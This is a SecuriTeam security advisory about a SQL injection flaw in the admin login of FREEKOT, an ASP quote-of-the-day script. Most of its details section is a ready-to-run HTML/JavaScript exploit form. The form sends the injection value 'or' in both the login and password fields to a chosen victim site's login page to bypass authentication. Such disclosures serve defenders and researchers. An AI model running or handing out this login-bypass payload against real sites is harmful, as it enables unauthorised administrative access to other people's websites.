[UNIX] FREEKOT SQL Injection



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



FREEKOT SQL Injection
------------------------------------------------------------------------


SUMMARY

<http://www.digiappz.com/> FREEKOT is "a free tool written in ASP which
allows you to insert a random quotation system or a quote of the day in
your website". A vulnerability in FREEKOT allows remote attackers to cause
the product to insert arbitrary SQL into its existing SQL statements.

DETAILS

Input passed to the "login" and "password" parameters when logging into
the administration section isn't properly sanitised before being used in a
SQL query. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

Exploit:
<html>
<head><title>KAPDA :: Freekot SQL-Injection Vulnerability , Login bypass
exploit </title></head>
<body bgcolor="black">
<script language="JavaScript">
function egxpl() {
if (document.xplt.victim.value=="") {
alert("Please enter victim site!");
return false;
}
if (confirm("Are you sure?")) {
xplt.action=document.xplt.victim.value+"/login_verif.asp";
xplt.login.value=document.xplt.login.value;
xplt.password.value=document.xplt.password.value;
xplt.submit();
}
}
</script><font face=Verdana size=2 color="#00FF00"><center><b>KAPDA ::
Freekot SQL-Injection Vulnerability<br>
Discovered and coded by FarhadKey From KAPDA.IR<br>
Special Thx to Hessam-x From Anti-Security.net (Hackerz.ir)<br></b>
<form name="xplt" method="post" onsubmit="egxpl();">
<br>Victim Path : (insert http:// for path)<br>
<input type="text" name="victim"
value="http://www.victim.com/FreeKot_Path/"; size="44" class="xpl"
style="color: #00FF00; background-color: #000000"><br>
<input type="hidden" name="login" value="'or'">
<input type="hidden" name="password" value="'or'"><br>
<!-- Discovered and coded by FarhadKey . Kapda.ir -->
<input type="submit" value="GO !!!" style="color: #00FF00;
background-color: #000000">
</form></body></html>


ADDITIONAL INFORMATION

The information has been provided by <mailto:farhadkey@xxxxxxxx>
FarhadKey of KAPD.
The original article can be found at:
<http://www.kapda.ir/advisory-410.html>
http://www.kapda.ir/advisory-410.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [REVS] Lateral SQL Injection: a New Class of Vulnerability in Oracle
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lateral SQL Injection: a New Class of Vulnerability in Oracle ... How can an attacker exploit a PL/SQL procedure that doesn't even take user ... is then dynamically executed via the EXECUTE IMMEDIATE statement. ...
    (Securiteam)
  • [UNIX] Multiple Vulnerabilities MetaDot Portal Server
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... SQL Injection: ... query he can cause an error message to execute script into an unsuspecting ... users browser thus causing a Cross Site Scripting attack. ...
    (Securiteam)
  • [UNIX] Joomla BSQ Sitestats Component Multiple Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Secunia Research has discovered some vulnerabilities in the BSQ ... SQL query. ... Successful exploitation requires that "register_globals" is enabled. ...
    (Securiteam)
  • [NEWS] TorrentTrader Multiple SQL Injection Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... TorrentTrader Multiple SQL Injection Vulnerabilities ...
    (Securiteam)
  • [UNIX] dev4u CMS Multiple SQL Injection and Cross Site Scripting Issues
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... dev4u CMS Multiple SQL Injection and Cross Site Scripting Issues ... arbitrary SQL statements as well as include arbitrary HTML and/or ...
    (Securiteam)